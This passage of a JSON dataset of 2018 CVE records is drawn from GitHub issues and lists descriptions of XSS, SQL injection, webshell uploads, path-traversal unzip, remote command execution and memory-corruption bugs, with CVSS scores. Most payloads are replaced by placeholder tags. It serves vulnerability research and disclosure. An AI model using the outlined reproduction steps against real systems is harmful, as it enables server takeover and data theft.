  21211. "description": "Segmentation Fault. I build tinyexr with gcc. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a segmentation fault is triggered. GDB provides information as follow NUMBERTAG f NUMBERTAG in APITAG short , int, int, int, int, unsigned short NUMBERTAG e in APITAG char , unsigned char const , unsigned long, unsigned long, int, APITAG const , int, int NUMBERTAG ad in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG b in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long NUMBERTAG cee in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const NUMBERTAG a NUMBERTAG in APITAG NUMBERTAG a in APITAG NUMBERTAG d0 in APITAG NUMBERTAG f2e1 in main ()",
  21212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21213. "severity": "CRITICAL",
  21214. "baseScore": 9.8,
  21215. "impactScore": 5.9,
  21216. "exploitabilityScore": 3.9
  21217. },
  21218. {
  21219. "CVE_ID": "CVE-2018-12695",
  21220. "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/2",
  21221. "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/2",
  21222. "Repo_new": "nsmaomao/mao10cms",
  21223. "Issue_Created_At": "2018-06-25T15:47:25Z",
  21224. "description": "Stored XSS at the bbs page. FILETAG",
  21225. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21226. "severity": "MEDIUM",
  21227. "baseScore": 6.1,
  21228. "impactScore": 2.7,
  21229. "exploitabilityScore": 2.8
  21230. },
  21231. {
  21232. "CVE_ID": "CVE-2018-12696",
  21233. "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/3",
  21234. "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/3",
  21235. "Repo_new": "nsmaomao/mao10cms",
  21236. "Issue_Created_At": "2018-06-25T15:57:15Z",
  21237. "description": "Stored XSS at the article. The xss was found at the article page. Ishould set up a topic to write article. FILETAG I post a topic called xss to prove this xss. FILETAG First I input \" APITAG \" at the title and article just like this. FILETAG FILETAG When I submit it, we can see it showing normal FILETAG But if I edit this article again,and input \" APITAG \" at the title it will alert 'xss'.It is stored xss too. FILETAG",
  21238. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21239. "severity": "MEDIUM",
  21240. "baseScore": 6.1,
  21241. "impactScore": 2.7,
  21242. "exploitabilityScore": 2.8
  21243. },
  21244. {
  21245. "CVE_ID": "CVE-2018-12884",
  21246. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4674",
  21247. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4674",
  21248. "Repo_new": "octopusdeploy/issues",
  21249. "Issue_Created_At": "2018-06-26T00:55:25Z",
  21250. "description": "Users with incorrect permissions may be able to create Accounts. Under some circumstances, users without the correct permissions, may be able to create new Accounts (under the Infrastructure menu).",
  21251. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  21252. "severity": "MEDIUM",
  21253. "baseScore": 6.5,
  21254. "impactScore": 3.6,
  21255. "exploitabilityScore": 2.8
  21256. },
  21257. {
  21258. "CVE_ID": "CVE-2018-12889",
  21259. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
  21260. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
  21261. "Repo_new": "cn-uofbasel/ccn-lite",
  21262. "Issue_Created_At": "2018-06-26T11:50:27Z",
  21263. "description": "Heap Buffer Overrun in APITAG when reading CCNx or NDN binary file. Description Heap Buffer Overrun in APITAG issued by a non null terminated array when reading an binary CCNx or NDN file. This Heap Buffer Overrun can result in a Heap Corruption when parsing a binary CCNx or NDN file. Steps to reproduce the issue The Heap Corruption can be triggered by a binary NDN file with a longer data than indicated by a the corresponding TLV.",
  21264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21265. "severity": "CRITICAL",
  21266. "baseScore": 9.8,
  21267. "impactScore": 5.9,
  21268. "exploitabilityScore": 3.9
  21269. },
  21270. {
  21271. "CVE_ID": "CVE-2018-12905",
  21272. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/427",
  21273. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/427",
  21274. "Repo_new": "joyplus/joyplus-cms",
  21275. "Issue_Created_At": "2018-06-27T09:19:06Z",
  21276. "description": "i found another xss vul about FILETAG (\u64ad\u653e\u5668\u7ba1\u7406). APITAG FILETAG click \u2018\u7cfb\u7edf\u7ba1\u7406\u2019 (system manage) then click '\u6dfb\u52a0' (add) FILETAG click '\u4fdd\u5b58' (save) then refresh the page FILETAG",
  21277. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21278. "severity": "MEDIUM",
  21279. "baseScore": 6.1,
  21280. "impactScore": 2.7,
  21281. "exploitabilityScore": 2.8
  21282. },
  21283. {
  21284. "CVE_ID": "CVE-2018-12909",
  21285. "Issue_Url_old": "https://github.com/jokkedk/webgrind/issues/112",
  21286. "Issue_Url_new": "https://github.com/jokkedk/webgrind/issues/112",
  21287. "Repo_new": "jokkedk/webgrind",
  21288. "Issue_Created_At": "2018-06-27T00:04:15Z",
  21289. "description": "Local File Disclosure using fileviewer functionality. Line NUMBERTAG in FILETAG lets anyone view all the local files the web server has access to. APITAG Example exploit APITAG Can we avoid relying on user input to get 'file'?",
  21290. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21291. "severity": "HIGH",
  21292. "baseScore": 7.5,
  21293. "impactScore": 3.6,
  21294. "exploitabilityScore": 3.9
  21295. },
  21296. {
  21297. "CVE_ID": "CVE-2018-12912",
  21298. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/4",
  21299. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/4",
  21300. "Repo_new": "neeke/hongcms",
  21301. "Issue_Created_At": "2018-06-26T04:43:47Z",
  21302. "description": "APITAG NUMBERTAG SQL Injection. Vulnerability file: PATHTAG > private function APITAG > { > $this >db >exe(\"DELETE FROM APITAG \"); > $msg = '\u5df2\u5b8c\u6210\u6e05\u7a7a\u6570\u636e\u5e93\u8868: ' . $tablename . ' APITAG '; > > return $msg; > } The $tablename parameter controllable. POC APITAG Privilege): > PATHTAG FILETAG",
  21303. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  21304. "severity": "HIGH",
  21305. "baseScore": 7.2,
  21306. "impactScore": 5.9,
  21307. "exploitabilityScore": 1.2
  21308. },
  21309. {
  21310. "CVE_ID": "CVE-2018-12914",
  21311. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/13",
  21312. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/13",
  21313. "Repo_new": "sanluan/publiccms",
  21314. "Issue_Created_At": "2018-06-27T10:03:08Z",
  21315. "description": "There is a APITAG Unzip\" vulnerability that can get webshell. ver NUMBERTAG using a specially crafted zip archive, that holds path traversal APITAG you used unzip method you will get a shell a zip looks like this: FILETAG the path you will get from there: FILETAG (so,your website true path is PATHTAG ) upload and unzip FILETAG FILETAG APITAG will write into your server FILETAG Execute the command FILETAG FILETAG",
  21316. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21317. "severity": "CRITICAL",
  21318. "baseScore": 9.8,
  21319. "impactScore": 5.9,
  21320. "exploitabilityScore": 3.9
  21321. },
  21322. {
  21323. "CVE_ID": "CVE-2018-12915",
  21324. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/118",
  21325. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/118",
  21326. "Repo_new": "cloudwu/pbc",
  21327. "Issue_Created_At": "2018-06-27T07:32:26Z",
  21328. "description": "global buffer overflow in calc_hash APITAG Hello.I use my company tool.I found two APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
  21329. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21330. "severity": "CRITICAL",
  21331. "baseScore": 9.8,
  21332. "impactScore": 5.9,
  21333. "exploitabilityScore": 3.9
  21334. },
  21335. {
  21336. "CVE_ID": "CVE-2018-12916",
  21337. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/120",
  21338. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/120",
  21339. "Repo_new": "cloudwu/pbc",
  21340. "Issue_Created_At": "2018-06-27T07:47:36Z",
  21341. "description": "Segmentation fault in APITAG (). Hello.I use my company tool.I found two Segmentation APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
  21342. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21343. "severity": "CRITICAL",
  21344. "baseScore": 9.8,
  21345. "impactScore": 5.9,
  21346. "exploitabilityScore": 3.9
  21347. },
  21348. {
  21349. "CVE_ID": "CVE-2018-12917",
  21350. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/119",
  21351. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/119",
  21352. "Repo_new": "cloudwu/pbc",
  21353. "Issue_Created_At": "2018-06-27T07:37:01Z",
  21354. "description": "heap buffer overflow in APITAG APITAG Hello.I use my company tool.I found two APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
  21355. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21356. "severity": "CRITICAL",
  21357. "baseScore": 9.8,
  21358. "impactScore": 5.9,
  21359. "exploitabilityScore": 3.9
  21360. },
  21361. {
  21362. "CVE_ID": "CVE-2018-12918",
  21363. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/121",
  21364. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/121",
  21365. "Repo_new": "cloudwu/pbc",
  21366. "Issue_Created_At": "2018-06-27T07:51:36Z",
  21367. "description": "Segmentation fault in . Hello.I use my company tool.I found two Segmentation APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
  21368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21369. "severity": "CRITICAL",
  21370. "baseScore": 9.8,
  21371. "impactScore": 5.9,
  21372. "exploitabilityScore": 3.9
  21373. },
  21374. {
  21375. "CVE_ID": "CVE-2018-12972",
  21376. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1239",
  21377. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1239",
  21378. "Repo_new": "opentsdb/opentsdb",
  21379. "Issue_Created_At": "2018-06-29T02:55:11Z",
  21380. "description": "vulnerability! remote command execute in 'q' request method. many parameters which in \u2018q\u2019 request method can execute command, including o, key, style, yrange and its json input, y2range and its json input. url: opentsdb APITAG ps: opentsdb a.b.com is a host which use opentsdb service. poc: take 'o' parameter as example, requeset url: opentsdb APITAG c NUMBERTAG APITAG response: show ping infomations.",
  21381. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21382. "severity": "CRITICAL",
  21383. "baseScore": 9.8,
  21384. "impactScore": 5.9,
  21385. "exploitabilityScore": 3.9
  21386. },
  21387. {
  21388. "CVE_ID": "CVE-2018-12973",
  21389. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1240",
  21390. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1240",
  21391. "Repo_new": "opentsdb/opentsdb",
  21392. "Issue_Created_At": "2018-06-29T03:03:34Z",
  21393. "description": "vulnerability! XSS in \u2018q\u2019 request method. there is XSS in parameter 'json' of \u2018q\u2019 request method. url and payload: opentsdb APITAG APITAG <\" ps: opentsdb a.b.com is a host which use opentsdb service.",
  21394. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21395. "severity": "MEDIUM",
  21396. "baseScore": 6.1,
  21397. "impactScore": 2.7,
  21398. "exploitabilityScore": 2.8
  21399. },
  21400. {
  21401. "CVE_ID": "CVE-2018-12988",
  21402. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/111",
  21403. "Issue_Url_new": "https://github.com/greencms/greencms/issues/111",
  21404. "Repo_new": "greencms/greencms",
  21405. "Issue_Created_At": "2018-06-27T01:32:12Z",
  21406. "description": "APITAG NUMBERTAG payload GET /greencms APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG id\u53c2\u6570\u503c\u4e3abase NUMBERTAG APITAG \u89e3\u7801\u4e3a\uff1a PATHTAG",
  21407. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21408. "severity": "HIGH",
  21409. "baseScore": 7.5,
  21410. "impactScore": 3.6,
  21411. "exploitabilityScore": 3.9
  21412. },
  21413. {
  21414. "CVE_ID": "CVE-2018-12993",
  21415. "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/6",
  21416. "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/6",
  21417. "Repo_new": "rocktronica/onefilecms",
  21418. "Issue_Created_At": "2018-06-28T15:39:39Z",
  21419. "description": "the username and password can be bruted. FILETAG",
  21420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21421. "severity": "CRITICAL",
  21422. "baseScore": 9.8,
  21423. "impactScore": 5.9,
  21424. "exploitabilityScore": 3.9
  21425. },
  21426. {
  21427. "CVE_ID": "CVE-2018-12994",
  21428. "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/7",
  21429. "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/7",
  21430. "Repo_new": "rocktronica/onefilecms",
  21431. "Issue_Created_At": "2018-06-28T16:12:08Z",
  21432. "description": "The \" New APITAG \" button cause getshell. FILETAG use username and password login the page type New filename ' FILETAG ' click Create FILETAG FILETAG created successfully. FILETAG click FILETAG write below APITAG click save FILETAG NUMBERTAG php saved successfully. PATHTAG FILETAG",
  21433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  21434. "severity": "HIGH",
  21435. "baseScore": 8.8,
  21436. "impactScore": 5.9,
  21437. "exploitabilityScore": 2.8
  21438. },
  21439. {
  21440. "CVE_ID": "CVE-2018-12996",
  21441. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/7",
  21442. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/7",
  21443. "Repo_new": "unh3x/just4cve",
  21444. "Issue_Created_At": "2018-06-28T15:46:12Z",
  21445. "description": "Zoho manageengine Applications Manager Reflected XSS. ================= Zoho manageengine Applications Manager Reflected XSS ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Proof of Concept: ================= APITAG notice: It can be successfully reproduced under IE.",
  21446. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21447. "severity": "MEDIUM",
  21448. "baseScore": 6.1,
  21449. "impactScore": 2.7,
  21450. "exploitabilityScore": 2.8
  21451. },
  21452. {
  21453. "CVE_ID": "CVE-2018-12997",
  21454. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/8",
  21455. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/8",
  21456. "Repo_new": "unh3x/just4cve",
  21457. "Issue_Created_At": "2018-06-28T15:56:42Z",
  21458. "description": "Zoho manageengine Arbitrary File Read in multiple Products. ================= Zoho manageengine Arbitrary File Read in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= CODETAG FILETAG Notice: This vul can reproduce without login.",
  21459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21460. "severity": "HIGH",
  21461. "baseScore": 7.5,
  21462. "impactScore": 3.6,
  21463. "exploitabilityScore": 3.9
  21464. },
  21465. {
  21466. "CVE_ID": "CVE-2018-12998",
  21467. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/10",
  21468. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/10",
  21469. "Repo_new": "unh3x/just4cve",
  21470. "Issue_Created_At": "2018-06-28T16:10:44Z",
  21471. "description": "Zoho manageengine Arbitrary Reflected XSS in multiple Products . ================= Zoho manageengine XSS in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= APITAG FILETAG Notice: This vul can reproduce without login.",
  21472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21473. "severity": "MEDIUM",
  21474. "baseScore": 6.1,
  21475. "impactScore": 2.7,
  21476. "exploitabilityScore": 2.8
  21477. },
  21478. {
  21479. "CVE_ID": "CVE-2018-12999",
  21480. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/9",
  21481. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/9",
  21482. "Repo_new": "unh3x/just4cve",
  21483. "Issue_Created_At": "2018-06-28T16:04:32Z",
  21484. "description": "Zoho manageengine Desktop Central Arbitrary File Deletion. ================= Zoho manageengine Desktop Central Arbitrary File Deletion ================= Date: PATHTAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi ================= APITAG ================= Proof of Concept: ================= CODETAG notice: It can be successfully reproduced without login info.",
  21485. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  21486. "severity": "HIGH",
  21487. "baseScore": 7.5,
  21488. "impactScore": 3.6,
  21489. "exploitabilityScore": 3.9
  21490. },
  21491. {
  21492. "CVE_ID": "CVE-2018-13005",
  21493. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1088",
  21494. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1088",
  21495. "Repo_new": "gpac/gpac",
  21496. "Issue_Created_At": "2018-06-28T08:55:42Z",
  21497. "description": "in box_code_base.c line NUMBERTAG has a heap overflow.. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [ x ] I looked for a similar issue and couldn't find any. [ x ] I tried with the latest version of GPAC. Installers available at github commit NUMBERTAG I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When you end the while loop, you access tmpname[to_read NUMBERTAG causing a heap overflow. You should change it like this APITAG",
  21498. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21499. "severity": "CRITICAL",
  21500. "baseScore": 9.8,
  21501. "impactScore": 5.9,
  21502. "exploitabilityScore": 3.9
  21503. },
  21504. {
  21505. "CVE_ID": "CVE-2018-13007",
  21506. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/29",
  21507. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/29",
  21508. "Repo_new": "gopro/gpmf-parser",
  21509. "Issue_Created_At": "2018-06-29T03:40:40Z",
  21510. "description": "three heap overflow in GPMF_parser.c in function APITAG three heap overflow in GPMF_parser.c line NUMBERTAG line NUMBERTAG line NUMBERTAG in function APITAG fix it like this APITAG asan report ERRORTAG FILETAG",
  21511. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21512. "severity": "CRITICAL",
  21513. "baseScore": 9.8,
  21514. "impactScore": 5.9,
  21515. "exploitabilityScore": 3.9
  21516. },
  21517. {
  21518. "CVE_ID": "CVE-2018-13010",
  21519. "Issue_Url_old": "https://github.com/wstmall/wstmall/issues/4",
  21520. "Issue_Url_new": "https://github.com/wstmall/wstmall/issues/4",
  21521. "Repo_new": "wstmall/wstmall",
  21522. "Issue_Created_At": "2018-06-28T14:07:25Z",
  21523. "description": "CSRF that can add or delete user account. This vulnerability was found at the admin page. FILETAG As we can see NUMBERTAG users' integral are NUMBERTAG It was created by CSRF. CODETAG If we post this form and admin click it, it will add an account. Attacker can use this to earn integral maliciously FILETAG Attacker also can delete any account include store account by CSRF There are NUMBERTAG store accounts to test FILETAG",
  21524. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21525. "severity": "HIGH",
  21526. "baseScore": 8.8,
  21527. "impactScore": 5.9,
  21528. "exploitabilityScore": 2.8
  21529. },
  21530. {
  21531. "CVE_ID": "CVE-2018-13011",
  21532. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/31",
  21533. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/31",
  21534. "Repo_new": "gopro/gpmf-parser",
  21535. "Issue_Created_At": "2018-06-29T06:45:10Z",
  21536. "description": "a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG asan report ERRORTAG FILETAG",
  21537. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21538. "severity": "CRITICAL",
  21539. "baseScore": 9.8,
  21540. "impactScore": 5.9,
  21541. "exploitabilityScore": 3.9
  21542. },
  21543. {
  21544. "CVE_ID": "CVE-2018-13021",
  21545. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/5",
  21546. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/5",
  21547. "Repo_new": "neeke/hongcms",
  21548. "Issue_Created_At": "2018-06-29T06:43:03Z",
  21549. "description": "Arbitrary File Upload Getshell . Steps To Reproduce NUMBERTAG Login to the backstage as the admin NUMBERTAG POST ERRORTAG NUMBERTAG shell is FILETAG FILETAG FILETAG",
  21550. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  21551. "severity": "HIGH",
  21552. "baseScore": 7.2,
  21553. "impactScore": 5.9,
  21554. "exploitabilityScore": 1.2
  21555. },
  21556. {
  21557. "CVE_ID": "CVE-2018-13026",
  21558. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/32",
  21559. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/32",
  21560. "Repo_new": "gopro/gpmf-parser",
  21561. "Issue_Created_At": "2018-06-30T03:34:43Z",
  21562. "description": "a heap buffer overflow in APITAG function APITAG a heap buffer overflow in APITAG function APITAG ERRORTAG FILETAG",
  21563. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21564. "severity": "CRITICAL",
  21565. "baseScore": 9.8,
  21566. "impactScore": 5.9,
  21567. "exploitabilityScore": 3.9
  21568. },
  21569. {
  21570. "CVE_ID": "CVE-2018-13030",
  21571. "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/12",
  21572. "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/12",
  21573. "Repo_new": "kornelski/jpeg-compressor",
  21574. "Issue_Created_At": "2018-06-30T08:57:29Z",
  21575. "description": "A crash with specific image:stack buffer overflow. I use Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG this file URLTAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
  21576. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21577. "severity": "HIGH",
  21578. "baseScore": 7.8,
  21579. "impactScore": 5.9,
  21580. "exploitabilityScore": 1.8
  21581. },
  21582. {
  21583. "CVE_ID": "CVE-2018-13031",
  21584. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/6",
  21585. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/6",
  21586. "Repo_new": "autismjh/damicms",
  21587. "Issue_Created_At": "2019-12-02T15:35:30Z",
  21588. "description": "Bug NUMBERTAG Cross site request APITAG admin). There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG APITAG page has changed FILETAG NUMBERTAG check source code There are some codes check token, but as if not take function FILETAG We find the default PATHTAG 'TOKEN_ON' => false, Means not user token, so have the Cross site request forgery vulnerability FILETAG",
  21589. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21590. "severity": "HIGH",
  21591. "baseScore": 8.8,
  21592. "impactScore": 5.9,
  21593. "exploitabilityScore": 2.8
  21594. },
  21595. {
  21596. "CVE_ID": "CVE-2018-13037",
  21597. "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/13",
  21598. "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/13",
  21599. "Repo_new": "kornelski/jpeg-compressor",
  21600. "Issue_Created_At": "2018-07-01T04:08:57Z",
  21601. "description": "A crash with a specific image: heap buffer overflow in function bmp_load. I used Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG. This file URLTAG can cause a heap buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
  21602. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21603. "severity": "HIGH",
  21604. "baseScore": 7.8,
  21605. "impactScore": 5.9,
  21606. "exploitabilityScore": 1.8
  21607. },
  21608. {
  21609. "CVE_ID": "CVE-2018-13038",
  21610. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1177",
  21611. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1177",
  21612. "Repo_new": "opensid/opensid",
  21613. "Issue_Created_At": "2018-07-01T09:10:19Z",
  21614. "description": "FILETAG FILETAG NUMBERTAG Selanjutnya simpan, dan pergi ke halaman ubah artikel yang tadi kita buat. FILETAG NUMBERTAG Ketika link download diklik, maka akan diarahkan keahalaman backdoor PHP yang berhasil terupload. Melalui backdoor ini dapat digunakan untuk mengeksekusi perintah sistem seperti whoami. Sekenario terburuknya adalah server dapat diambil alih. FILETAG Seperti apa yang diharapkan? Pengembang perlu memfilter fitur upload lampiran. Tidak hanya memfilter extension saja namun perlu memfilter mime type. Jangan perbolehkan PHP dapat diupload ke server, karena risikonya begitu besar. Apa yang terjadi? Risiko terburuknya server dapat diambil alih melalui bug ini. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21615. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21616. "severity": "CRITICAL",
  21617. "baseScore": 9.8,
  21618. "impactScore": 5.9,
  21619. "exploitabilityScore": 3.9
  21620. },
  21621. {
  21622. "CVE_ID": "CVE-2018-13039",
  21623. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1175",
  21624. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1175",
  21625. "Repo_new": "opensid/opensid",
  21626. "Issue_Created_At": "2018-07-01T08:11:38Z",
  21627. "description": "FILETAG Seperti apa yang diharapkan? Pengembang perlu melakukan filter spesial karakter untuk memfilter atau menggunakan library anti XSS yang terdapat pada CI untuk megantisipasi serangan XSS. Apa yang terjadi? Serangan XSS dapat berdampak pada sisi client. Melalui serangan ini dapat dimanfaatkan oleh attacker untuk mengambil cookies korban, mengalihkan kehalaman yang mengandung malware atau phising site. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21629. "severity": "MEDIUM",
  21630. "baseScore": 6.1,
  21631. "impactScore": 2.7,
  21632. "exploitabilityScore": 2.8
  21633. },
  21634. {
  21635. "CVE_ID": "CVE-2018-13040",
  21636. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1176",
  21637. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1176",
  21638. "Repo_new": "opensid/opensid",
  21639. "Issue_Created_At": "2018-07-01T08:36:19Z",
